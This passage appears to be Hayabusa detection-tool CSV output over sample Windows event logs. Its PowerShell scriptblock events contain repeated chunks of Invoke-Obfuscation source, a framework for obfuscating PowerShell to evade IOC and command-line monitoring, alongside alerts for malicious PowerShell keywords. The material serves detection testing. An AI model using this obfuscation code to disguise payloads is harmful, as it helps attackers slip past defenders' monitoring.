'Daniel Bohannon (@danielhbohannon)' # Copyright statement for this module Copyright = 'Apache License, Version 2.0' # Description of the functionality provided by this module Description = 'PowerShell module file for importing all required modules for the Invoke-Obfuscation framework.' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' # Minimum version of the Windows PowerShell host required by this module PowerShellHostVersion = '2.0' # Script files (.ps1) that are run in the caller's environment prior to importing this module ScriptsToProcess = @('Out-ObfuscatedTokenCommand.ps1','Out-ObfuscatedStringCommand.ps1','Out-EncodedAsciiCommand.ps1','Out-EncodedHexCommand.ps1','Out-EncodedOctalCommand.ps1','Out-EncodedBinaryCommand.ps1','Out-SecureStringCommand.ps1','Out-EncodedBXORCommand.ps1','Out-EncodedSpecialCharOnlyCommand.ps1','Out-EncodedWhitespaceCommand.ps1','Out-PowerShellLauncher.ps1','Invoke-Obfuscation.ps1') # Functions to export from this module FunctionsToExport = '*' # HelpInfo URI of this module # HelpInfoURI = '' }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' ) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. $TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. # This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' ) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. $TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. # This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
